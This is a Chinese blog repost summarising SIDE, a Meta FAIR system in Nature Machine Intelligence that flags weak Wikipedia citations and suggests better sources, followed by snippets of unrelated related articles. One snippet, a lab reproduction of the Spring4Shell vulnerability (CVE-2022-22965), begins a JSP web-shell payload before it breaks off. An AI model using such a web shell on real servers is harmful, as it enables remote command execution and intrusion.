知识链接,人工智能可以帮助人类验证世界知识吗?#verify_wikipedia

f61d8498fbe1e89d089049cd9dc59c5e.png

这是一篇来自Samaya AI的文章,主要介绍了其 CTO 在 Meta AI's FAIR labs 工作发表在 nature 上的一篇论文成果,用于验证和改进维基百科上的引用来源。我做了一些精选和整理,分享给大家:

研究背景

几千年来,人类一直在创造知识。计算机的出现把知识数字化了,而互联网的出现使其可以被更容易获取,从而促进了进一步的知识创造。

搜索引擎极大地增加了我们在日常决策中可以使用的信息的广度和可访问性,远远超出了纸质书籍和传统图书馆的限制。

然而,获得大量知识并不能让我们无所不知——理解这些知识仍然极其困难且耗时。

研究人员仍然需要阅读文献、写笔记、在头脑中将各个点联系起来。知识工作者需要多年的经验、研究和阅读才能发现新颖的关联。此外,由于不同的信息可能相互冲突,并且必须理解并追溯到其原始来源,因此该过程变得复杂。



论文

Improving Wikipedia verifiability with AI

研究表明,构建机器来帮助人类导航、解释和验证世界知识在今天是可以实现的。

维基百科是地球上使用最广泛的知识集合之一,在志愿者和专家编辑的支持下,这是一项令人难以置信的集体努力。

维基百科是可验证的,信息来源有大量的引用支持,以便“使用百科全书的人可以检查信息是否来自可靠的来源”。


然而,确保维基百科的可验证性的任务是艰巨的。专家编辑目前依靠志愿者的工作,截至目前,维基百科上有超过 500,000 条语句被标记为“需要引用”。

在论文中,作者展示了机器可以协助编辑完成引用的校对和建议——

发现有问题的引用并提高其可验证性。


7f8701d4470779af15260b4166fb1d19.png

SIDE

一种基于人工智能的系统,旨在提高Wikipedia引用的可验证性。通过使用信息检索系统和语言模型,SIDE可以识别Wikipedia引用中不太可能支持其主张的引用,并从网络中推荐更好的引用。

1/ 需要验证的引用

SIDE 利用专门的语言模型来评估维基百科的声明-引文对,分配可验证性分数并识别潜在的证据不足。

eceea58c6fb87d5028c87ddc0337bc49.png

2/ 检索引擎

它配备了一个检索引擎,能够提取上下文中的维基百科声明,并在网络规模的“Sphere”语料库中搜索替代来源。

3ec3a9981b91f589af64549ff1101ce3.png

3/ 建议的引用

SIDE 会标记可验证性较低的声明,并建议替代来源,从而可能指导编辑的内容管理过程。

4284445f8bb721ec0b338f584440a1e4.jpeg

SIDE 展示了强大能力,它不仅可以识别这些差异,而且当声明被认为可能无法验证时,维基百科用户通常更喜欢系统建议的引用,而不是原始维基百科的引用。

社群交流通道:

503467ee1d5580f232cd47599d298f2a.jpeg

原文:

https://samaya.ai/blog/

https://www.nature.com/articles/s42256-023-00726-1

https://github.com/facebookresearch/side/tree/main/projects/verify_wikipedia

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/120794.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

中国技术的对外输出:Telegram也开始搞小程序应用了

Telegram 宣布为其开发者提供了一项“能够在其中运行迷你应用”的新功能( 迷你应用即 Mini App,下文中以“小程序”代替)。 在 Telegram 的博客中,开发人员介绍可以使用 JavaScript 构建自己的迷你应用 在一篇博客文章中&#xf…

【linux】麒麟v10安装Redis主从集群(ARM架构)

安装redis单示例的请看:麒麟v10安装Redis(ARM架构) 安装环境 ​Hostname​IP addressmaster192.168.0.1slave1192.168.0.2slave2192.168.0.3 下载安装包 (三台都操作) wget https://repo.huaweicloud.com/kunpeng/…

69 划分字母区间

划分字母区间 题解1 贪心1(方法略笨,性能很差)题解2 贪心2(参考标答) 给你一个字符串 s 。我们要把这个字符串划分为尽可能多的片段,同一字母最多出现在一个片段中。 注意,划分结果需要满足&am…

“从部署到优化,打造高效会议管理系统“

目录 引言一、部署单机项目 - 会议OA1.1 硬件和软件环境准备1.2 检查项目1.3 系统部署1.后端部署 二、部署前后端分离项目 - SPA项目后端部署2.前端部署 总结 引言 在现代化办公环境中,会议是组织沟通、决策和合作的重要方式之一。为了提高会议的效率和质量&#x…

针对element-plus,跳转jump(快速翻页)

待补充 const goToPage () > {const inputElement document.querySelector(.el-pagination .el-input__inner);console.log(inputElement, inputElement); } 打印之后可以看到分页跳转的数字输入框,是有进行处理的,max"102",是我自己的…

【每日一题】掷骰子等于目标和的方法数

文章目录 Tag题目来源题目解读解题思路方法一:动态规划 写在最后 Tag 【动态规划】【数组】 题目来源 1155. 掷骰子等于目标和的方法数 题目解读 你手里有 n 个一样的骰子,每个骰子都有 k 个面,分别标号 1 到 n。给定三个整数 n&#xff0…

【Linux】操作系统以及虚拟机的安装与配置

🥳🥳Welcome Huihuis Code World ! !🥳🥳 接下来看看由辉辉所写的关于Linux的相关操作吧 目录 🥳🥳Welcome Huihuis Code World ! !🥳🥳 一.操作系统的介绍 二.VMWare虚拟机的安装…

游戏研发的解决方案有哪些?

游戏研发的解决方案可以根据不同的需求和情境而有所不同,以下是一些常见的游戏研发解决方案: 游戏引擎: 游戏引擎是游戏研发的基础,它提供了开发游戏所需的核心功能,如图形渲染、物理引擎、音效管理、动画等。一些流行…

子集生成算法:给定一个集合,枚举所有可能的子集

给定一个集合,枚举所有可能的子集。 (为简单起见,本文讨论的集合中没有重复元素) 1、方法一:增量构造法 第一种思路是一次选出一个元素放到集合中,程序如下: void print_subset(int n, int …

36基于matlab的对分解层数和惩罚因子进行优化

基于matlab的对分解层数和惩罚因子进行优化。蚁狮优化算法优化VMD,算术优化算法优化VMD,遗传优化算法优化VMD,灰狼优化算法优化VMD,海洋捕食者优化算法优化VMD,粒子群优化VMD,麻雀优化算法优化VMD,鲸鱼优化…

C语言 每日一题 PTA 10.27 day5

1.高速公路超速处罚 按照规定,在高速公路上行使的机动车,达到或超出本车道限速的10 % 则处200元罚款; 若达到或超出50 % ,就要吊销驾驶证。请编写程序根据车速和限速自动判别对该机动车的处理。 输入格式 : 输入在一行中给出2个正…

win10 + VS2017 编译libjpeg(jpeg-9b)

需要用到的文件: jpeg-9b.zip win32.mak 下载链接链接:https://pan.baidu.com/s/1Z0fwbi74-ZSMjSej-0dV2A 提取码:huhu 步骤1:下载并解压jpeg-9b。 这里把jpeg-9b解压到文件夹"D:\build-libs\jpeg\build\jpeg-9b" …

CVE-2022-22965 Spring Framework远程命令执行

0x01 影响版本 Spring Framework < 5.3.18 Spring Framework < 5.2.20 JDK>9 0x02 复现环境 vulhub/spring/cve-2022-22965 0x03 漏洞复现 首先docker-compose up -d开启靶场 输入payload <%if("j".equals(request.getParameter("pwd")…

LSM树原理详解

LSM树(Log-Structured-Merge-Tree)的名字往往会给初识者一个错误的印象&#xff0c;事实上&#xff0c;LSM树并不像B树、红黑树一样是一颗严格的树状数据结构&#xff0c;它其实是一种存储结构&#xff0c;目前HBase,LevelDB,RocksDB这些NoSQL存储都是采用的LSM树。 LSM树的核…

如何在用pip配置文件设置HTTP爬虫IP

首先&#xff0c;定义问题&#xff1a;在 Pip 中设置HTTP爬虫IP服务器&#xff0c;以便在网络上进行访问和下载。 亲身经验&#xff1a;我曾经遇到过类似问题&#xff0c;通过设置HTTP爬虫IP服务器成功解决了网络访问问题。 数据和引证&#xff1a;根据 pip 官方文档&#xff…

小程序如何设置自取规则

​在小程序中&#xff0c;自取规则是指当客户下单时选择无需配送的情况下&#xff0c;如何设置相关的计费方式、指定时段费用、免费金额、预定时间和起取金额。下面将详细介绍如何设置这些规则&#xff0c;以便更好地满足客户的需求。 在小程序管理员后台->配送设置->自…

0基础学习PyFlink——用户自定义函数之UDTAF

大纲 UDTAFTableAggregateFunction的实现累加器定义创建累加 返回类型计算 完整代码 在前面几篇文章中&#xff0c;我们分别介绍了UDF、UDTF和UDAF这三种用户自定义函数。本节我们将介绍最后一种函数&#xff1a;UDTAF——用户自定义表值聚合函数。 UDTAF UDTAF函数即具备了…

什么是腾讯云轻量应用服务器?轻量性能和价格表分享

腾讯云轻量应用服务器怎么样&#xff1f;什么是腾讯云轻量应用服务器&#xff1f;轻量应用服务器性能怎么样&#xff1f;腾讯云轻量应用服务器如何收费&#xff1f;轻量2核2G3M云服务器88元一年、3年轻量2核2G4M带宽优惠价366.6元、轻量2核4G5M服务器166.6元一年、3年轻量2核4G…

【Javascript】ajax(阿甲克斯)

目录 什么是ajax? 同步与异步 原理 注意 写一个ajax请求 创建ajax对象 设置请求方式和地址 发送请求 设置响应HTTP请求状态变化的函数 什么是ajax? 是基于javascript的一种用于创建快速动态网页的技术&#xff0c;是一种在无需重新加载整个网页的情况下&#xff0c…

计算机网络【CN】IPV4报文格式

版本&#xff08;4bit&#xff09;&#xff1a;IPV4/IPV6首部长度&#xff08;4bit&#xff09;&#xff1a;标识首部的长度 单位是4B最小为&#xff1a;20B最大为&#xff1a;60&#xff08;15*4&#xff09;B总长度&#xff08;16bit&#xff09;&#xff1a;整个数据报&…